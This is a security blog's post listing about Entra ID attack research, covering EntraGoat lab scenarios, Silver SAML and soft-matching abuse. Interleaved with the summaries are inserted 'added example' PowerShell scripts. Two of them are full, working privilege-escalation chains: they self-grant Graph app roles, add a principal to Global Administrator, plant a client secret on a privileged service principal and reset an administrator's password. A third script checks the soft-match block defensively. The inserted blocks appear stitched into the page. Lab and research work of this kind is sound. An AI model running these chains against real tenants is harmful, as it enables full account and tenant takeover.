Tomer Nahum’s Research Blog

👋 Welcome to my blog, I hope you like Entra and AD.

EntraGoat Scenario 3: Exploiting Group Ownership in Entra ID

Group MemberShipwreck – Sailed into Admin Waters

EntraGoat Scenario 3 demonstrates how legitimate Entra ID administrative features (group ownership, role-assignable groups, and service principal management) can be chained into an unintended privilege escalation path from a low-privileged user to Global Administrator. The attacker begins with a compromised IT support account that owns several groups, including a role-assignable group that holds the Application Administrator role. Because a group owner controls the group's membership, the attacker adds their own account to that group, inherits the role, and gains broad control over applications and service principals across the tenant. ...

November 9, 2025

EntraGoat Scenario 6: Exploiting Chained Misconfigurations to Impersonate Global Admin in Entra ID

Certificate Bypass Authority–Root Access Granted

EntraGoat Scenario 6 details a privilege escalation technique in Microsoft Entra ID where the player begins with low-privileged credentials and reaches Global Administrator by chaining misconfigured service principals, over-permissive app roles, and legitimate certificate-based authentication (CBA) functionality. Using leaked credentials from a legacy service principal, the attacker pivots through an identity they own, abuses privileged permissions to modify tenant-wide settings, enables CBA through a user who is eligible for Privileged Identity Management (PIM) for Groups, and uploads a rogue root certificate authority. The result is passwordless impersonation of a Global Admin that satisfies MFA, enabling complete tenant takeover and persistence. ...

October 5, 2025

EntraGoat Scenario 2: Exploiting App-Only Graph Permissions in Entra ID

Graph Me the Crown (and Roles)

EntraGoat Scenario 2 demonstrates how certificate-based authentication tied to an existing service principal, combined with overprivileged application permissions, can lead to Global Administrator compromise. The attacker starts with a leaked certificate that was exposed through continuous integration/continuous delivery (CI/CD) pipeline artifacts. The certificate is valid for a service principal that holds the AppRoleAssignment.ReadWrite.All application permission. Authenticating in an app-only context, the attacker abuses that permission to grant the same service principal another Graph permission, RoleManagement.ReadWrite.Directory. With it, the service principal can assign any directory role, including Global Administrator, to itself or to any other service principal. Finally, the attacker resets the admin's password and retrieves the scenario flag. ...
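The Scenario 2 chain, written out as an added example with the Microsoft Graph PowerShell SDK (this is not EntraGoat's own solution code). The tenant ID, the app ID of the service principal the leaked certificate is valid for, the certificate thumbprint and the target admin's UPN are placeholders; the Graph app ID and the Global Administrator role template ID are Microsoft's well-known values. Run it only against your own lab tenant.

```powershell
# Added example; not EntraGoat's solution code. Microsoft.Graph PowerShell SDK (v2) cmdlets.
# Assumptions (hypothetical values): tenant ID, the app (client) ID of the service principal
# the leaked certificate belongs to, that certificate's thumbprint (imported into
# Cert:\CurrentUser\My), and the UPN of the admin whose password is reset at the end.
# Run only against your own EntraGoat lab tenant.
$TenantId   = '00000000-0000-0000-0000-000000000000'      # assumption: lab tenant
$ClientId   = '11111111-1111-1111-1111-111111111111'      # assumption: appId the leaked cert is valid for
$Thumbprint = '0123456789ABCDEF0123456789ABCDEF01234567'  # assumption: leaked cert thumbprint
$TargetUpn  = 'admin@contoso.onmicrosoft.com'             # assumption: Global Admin to take over

$GraphAppId = '00000003-0000-0000-c000-000000000000'      # Microsoft Graph's well-known appId
$GaTemplate = '62e90394-69f5-4237-9190-012177145e10'      # Global Administrator roleTemplateId

function Connect-AsApp {
    # App-only (client credentials) sign-in with the certificate: no user, so no user MFA.
    Connect-MgGraph -TenantId $TenantId -ClientId $ClientId -CertificateThumbprint $Thumbprint -NoWelcome
}

# 1. Authenticate as the service principal the leaked certificate belongs to.
Connect-AsApp
$me    = Get-MgServicePrincipal -Filter "appId eq '$ClientId'"
$graph = Get-MgServicePrincipal -Filter "appId eq '$GraphAppId'"

# 2. List the Graph application permissions we already hold, resolved to names via Graph's appRoles.
$held = Get-MgServicePrincipalAppRoleAssignment -ServicePrincipalId $me.Id -All |
    Where-Object ResourceId -eq $graph.Id |
    ForEach-Object { ($graph.AppRoles | Where-Object Id -eq $_.AppRoleId).Value }
"Held Graph app permissions: $($held -join ', ')"
if ('AppRoleAssignment.ReadWrite.All' -notin $held) { throw 'AppRoleAssignment.ReadWrite.All is required for this path' }

# 3. Use AppRoleAssignment.ReadWrite.All to grant ourselves further Graph app roles.
#    RoleManagement.ReadWrite.Directory lets us write directory role memberships;
#    User.ReadWrite.All is what an app-only caller additionally needs to write a user's passwordProfile.
foreach ($perm in 'RoleManagement.ReadWrite.Directory', 'User.ReadWrite.All') {
    if ($perm -in $held) { continue }
    $role = $graph.AppRoles | Where-Object Value -eq $perm
    New-MgServicePrincipalAppRoleAssignment -ServicePrincipalId $me.Id `
        -PrincipalId $me.Id -ResourceId $graph.Id -AppRoleId $role.Id | Out-Null
    "Granted $perm to ourselves"
}

# 4. Get a new token that carries the newly granted roles.
Disconnect-MgGraph | Out-Null
Connect-AsApp

# 5. Put our service principal into Global Administrator (activate the role first if it never was).
$ga = Get-MgDirectoryRole -All | Where-Object RoleTemplateId -eq $GaTemplate
if (-not $ga) { $ga = New-MgDirectoryRole -RoleTemplateId $GaTemplate }
New-MgDirectoryRoleMemberByRef -DirectoryRoleId $ga.Id `
    -OdataId "https://graph.microsoft.com/v1.0/directoryObjects/$($me.Id)"
"Added $($me.DisplayName) to Global Administrator"

# 6. Fresh token again, then reset the target admin's password (the flag step of the scenario).
Disconnect-MgGraph | Out-Null
Connect-AsApp
$newPassword = -join ((48..57 + 65..90 + 97..122) | Get-Random -Count 24 | ForEach-Object { [char]$_ })
Update-MgUser -UserId $TargetUpn -PasswordProfile @{ Password = $newPassword; ForceChangePasswordNextSignIn = $false }
"Password for $TargetUpn reset; sign in with it to read the flag"
```

Permission names are resolved from the Graph service principal's own `AppRoles` list rather than hard-coded GUIDs, so the same script shows which permissions the principal already has before it touches anything. For defenders, step 3 is the tell: an appRoleAssignment whose principalId is the calling service principal itself, followed shortly by a service principal being added to a directory role.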

August 10, 2025

EntraGoat Scenario 1: Application Ownership Compromise in Entra ID

Misowned and Dangerous: An Owner's Manual to Global Admin

We begin our EntraGoat use examples with Scenario 1, which we've named Misowned and Dangerous: An Owner's Manual to Global Admin. This practical exercise shows how legitimate application ownership in Microsoft Entra ID can be leveraged to escalate privileges and compromise a Global Administrator account, enabling complete tenant takeover. Starting with a compromised low-privileged user account, the attacker discovers that the account owns an enterprise application (service principal) which is assigned a privileged directory role. ...
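The two ownership paths above, Scenario 3 (owner of a role-assignable group) and Scenario 1 (owner of a privileged service principal), share one enumeration step and one endgame, so here is a single added example covering both; it is not EntraGoat's solution code. It assumes the Microsoft Graph PowerShell SDK, a lab tenant in which the Graph PowerShell app has already been consented for the delegated scopes requested, and placeholder values for the tenant ID and the target admin's UPN.

```powershell
# Added example; not EntraGoat's solution code. Walks the ownership paths from Scenarios 1 and 3:
# enumerate what the compromised user owns and which of it carries a directory role, add ourselves to
# an owned role-assignable group, then add our own credential to a privileged service principal we
# own (or, once we hold Application Administrator, any privileged one) and sign in as it.
# Assumptions: lab tenant ID and target UPN below are placeholders; the delegated scopes requested
# are already consented for the Graph PowerShell app in the lab tenant. Run only in your own lab.
$TenantId  = '00000000-0000-0000-0000-000000000000'  # assumption: lab tenant
$TargetUpn = 'admin@contoso.onmicrosoft.com'         # assumption: Global Admin to take over
$Scopes    = 'Directory.Read.All', 'RoleManagement.Read.Directory', 'GroupMember.ReadWrite.All', 'Application.ReadWrite.All'

# 1. Sign in as the low-privileged user (device code flow; no browser needed on this box).
Connect-MgGraph -TenantId $TenantId -Scopes $Scopes -UseDeviceCode -NoWelcome
$me = Get-MgUser -UserId (Get-MgContext).Account -Property Id,UserPrincipalName

function Get-RolesOf([string]$PrincipalId) {
    # Directory role names assigned to a user, group or service principal (empty if none).
    Get-MgRoleManagementDirectoryRoleAssignment -Filter "principalId eq '$PrincipalId'" -ExpandProperty roleDefinition |
        ForEach-Object { $_.RoleDefinition.DisplayName }
}

# 2. Enumerate everything we own and the roles each object carries.
$ownedGroups = @(); $ownedSps = @()
foreach ($o in Get-MgUserOwnedObject -UserId $me.Id -All) {
    switch ($o.AdditionalProperties['@odata.type']) {
        '#microsoft.graph.group' {
            $g = Get-MgGroup -GroupId $o.Id -Property Id,DisplayName,IsAssignableToRole
            $roles = @(Get-RolesOf $g.Id)
            '{0,-32} group  roleAssignable={1} roles={2}' -f $g.DisplayName, $g.IsAssignableToRole, ($roles -join ',')
            if ($g.IsAssignableToRole -and $roles) { $ownedGroups += $g }
        }
        '#microsoft.graph.servicePrincipal' {
            $roles = @(Get-RolesOf $o.Id)
            '{0,-32} SP     roles={1}' -f $o.AdditionalProperties['displayName'], ($roles -join ',')
            if ($roles) { $ownedSps += $o }
        }
    }
}

# 3. Scenario 3: as owner we can add ourselves to a role-assignable group; its role comes with it.
foreach ($g in $ownedGroups) {
    New-MgGroupMemberByRef -GroupId $g.Id -OdataId "https://graph.microsoft.com/v1.0/directoryObjects/$($me.Id)"
    "Added $($me.UserPrincipalName) to $($g.DisplayName) (roles: $((Get-RolesOf $g.Id) -join ','))"
}
if ($ownedGroups) {
    # Reconnect so the new membership, and the role it carries, applies to our session.
    Disconnect-MgGraph | Out-Null
    Connect-MgGraph -TenantId $TenantId -Scopes $Scopes -UseDeviceCode -NoWelcome
}

# 4. Scenario 1 (and the Scenario 3 endgame): pick a privileged service principal we can manage.
#    With Application Administrator every SP is manageable, so fall back to any SP holding a role.
if (-not $ownedSps) {
    $ownedSps = Get-MgRoleManagementDirectoryRoleAssignment -All -ExpandProperty principal |
        Where-Object { $_.Principal.AdditionalProperties['@odata.type'] -eq '#microsoft.graph.servicePrincipal' } |
        ForEach-Object { $_.Principal }
}
if (-not $ownedSps) { throw 'No service principal with a directory role is reachable from this account' }
$sp = Get-MgServicePrincipal -ServicePrincipalId ($ownedSps | Select-Object -First 1).Id -Property Id,AppId,DisplayName

# 5. Add our own client secret to it; ownership (or App Admin) is all that is needed for this write.
$secret = Add-MgServicePrincipalPassword -ServicePrincipalId $sp.Id -PasswordCredential @{ DisplayName = 'rotation-test' }
"Added secret to $($sp.DisplayName) (appId $($sp.AppId)), expires $($secret.EndDateTime)"

# 6. Sign in as that service principal and use its role to reset the target admin's password.
$cred = [pscredential]::new($sp.AppId, (ConvertTo-SecureString $secret.SecretText -AsPlainText -Force))
Disconnect-MgGraph | Out-Null
Connect-MgGraph -TenantId $TenantId -ClientSecretCredential $cred -NoWelcome
$newPassword = -join ((48..57 + 65..90 + 97..122) | Get-Random -Count 24 | ForEach-Object { [char]$_ })
Update-MgUser -UserId $TargetUpn -PasswordProfile @{ Password = $newPassword; ForceChangePasswordNextSignIn = $false }
"Password for $TargetUpn reset; sign in with it to read the flag"
```

Step 2 is the part worth running in any tenant, lab or not: it lists every group and service principal a given user owns together with the directory roles those objects hold, which is exactly the path both scenarios abuse. Step 6 assumes the service principal also holds an application permission that allows password writes; in the lab scenarios it does, elsewhere the call fails with 403 and nothing is changed.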

August 10, 2025

Getting Started with EntraGoat: Breaking Entra ID the Smart Way

EntraGoat is a deliberately vulnerable lab that simulates real-world identity misconfigurations in Microsoft Entra ID. Whether you're a red teamer, blue teamer, or just curious about identity attacks, this guide walks you through how to set up EntraGoat, launch your first challenge, and start capturing flags like a pro.

What is EntraGoat? Imagine a playground where you can:
- Escalate a user to Global Admin
- Chain permissions via the Graph API
- Abuse misconfigured apps and service principals
- Activate privileged roles to reset a Global Admin's MFA
- Simulate attacks without endangering production environments

That's exactly what EntraGoat offers: a CTF-style platform for learning identity exploitation in the cloud (Figure 1). ...

August 4, 2025

What is Entra Goat?

What Is EntraGoat? A Deliberately Vulnerable Microsoft Entra ID Lab

Meet EntraGoat: Figure 1 shows a preview of what you're getting into.

Figure 1. EntraGoat start screen

Why do identity security defenders need EntraGoat? Modern Entra ID environments are a goldmine for attackers. Over-permissioned apps, stale group assignments, and mismanaged service principals offer more than enough to escalate to Global Administrator with a few clever moves. EntraGoat reproduces these attack paths inside your own test tenant, giving you a safe and reproducible playground to learn, teach, test, or validate: ...

August 4, 2025

Meet Silver SAML: Golden SAML in the Cloud

Key Findings

Golden SAML, an attack technique that abuses the SAML single sign-on protocol, was used as a post-breach technique that compounded the devastating SolarWinds attack of 2020, one of the largest breaches of the 21st century. The SolarWinds supply chain attack affected thousands of organizations around the world, including the US Government: attackers planted malicious code in the company's Orion IT management and monitoring software. In the wake of that attack, CISA and cybersecurity experts encouraged organizations with hybrid identity environments to move SAML authentication to a cloud identity system such as Entra ID.

Tomer Nahum and Eric Woodruff have discovered a new application of Golden SAML, one that can be exploited even in organizations that have followed the earlier recommendations meant to defend against Golden SAML. The new technique, dubbed Silver SAML, uses an identity provider such as Entra ID to attack applications configured to rely on it for authentication, such as Salesforce. To our knowledge, no attacks using Silver SAML have been reported. We rate this vulnerability as Moderate, with a potential increase to Severe.

Golden SAML is a known attack technique discovered by CyberArk and published by Shaked Reiner. (Remember the Golden SAML attack that compounded the damage from the SolarWinds cyberattack, aka Solorigate?) For years, Golden SAML has meant extracting the token-signing certificate from Active Directory Federation Services (AD FS) and using it to forge SAML authentication responses. Today, we present a new application of Golden SAML: in Microsoft Entra ID, and without AD FS. Meet Silver SAML. ...

February 29, 2024

Soft-Matching Abuse in Azure AD

In Dirk-Jan's talk at Troopers 19 (I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory), he discussed an issue he had discovered: SMTP matching, one of the methods used to match Active Directory (AD) users synchronized up to Azure AD with existing cloud accounts, could be used to hijack accounts that had never been synchronized. He stated that Microsoft had blocked synchronizing an on-prem account onto a cloud account holding an active assignment to an administrative role in Azure AD, and that remark sparked the following research. This post shows how anyone with account creation privileges in an AD environment can change the password of an Azure AD user and, given some prerequisites, obtain privileged access through Eligible role assignments. ...
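The check a defender wants after reading the above is whether soft matching is blocked in the tenant at all. This is an added example, not code from the post: it reads, and optionally sets, the tenant-level soft-match block through the Microsoft Graph `onPremisesDirectorySynchronization` resource as I recall it from the Graph documentation (verify the endpoint and the `OnPremDirectorySynchronization.ReadWrite.All` scope against the current docs before relying on it). The legacy MSOnline equivalent is `Set-MsolDirSyncFeature -Feature BlockSoftMatch -Enable $true`.

```powershell
# Added example; not code from the post. Reports whether soft matching (and cloud-object takeover
# through hard matching) is blocked for the tenant, and enables the soft-match block when -Enforce is given.
# Assumptions: Microsoft.Graph PowerShell SDK; the endpoint and feature names are as I recall them from the
# Graph docs for onPremisesDirectorySynchronization; the signed-in user can consent to the scope.
param([switch]$Enforce)

Connect-MgGraph -Scopes 'OnPremDirectorySynchronization.ReadWrite.All' -NoWelcome

$uri  = 'https://graph.microsoft.com/v1.0/directory/onPremisesSynchronization'
$sync = Invoke-MgGraphRequest -Method GET -Uri $uri

foreach ($s in $sync.value) {
    $f = $s.features
    '{0}: blockSoftMatchEnabled={1} blockCloudObjectTakeoverThroughHardMatchEnabled={2}' -f `
        $s.id, $f.blockSoftMatchEnabled, $f.blockCloudObjectTakeoverThroughHardMatchEnabled

    # Soft matching is the path described above; leave it blocked unless a migration explicitly needs it.
    if (-not $f.blockSoftMatchEnabled) {
        if ($Enforce) {
            Invoke-MgGraphRequest -Method PATCH -Uri "$uri/$($s.id)" -ContentType 'application/json' `
                -Body @{ features = @{ blockSoftMatchEnabled = $true } }
            "Enabled blockSoftMatch on $($s.id)"
        } else {
            "WARNING: soft matching is allowed on $($s.id); rerun with -Enforce to block it"
        }
    }
}
```

Blocking soft match does not affect users that are already matched; it only stops new on-prem objects from being matched onto existing cloud accounts by email or UPN, which is the precondition the post's takeover relies on.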

November 29, 2022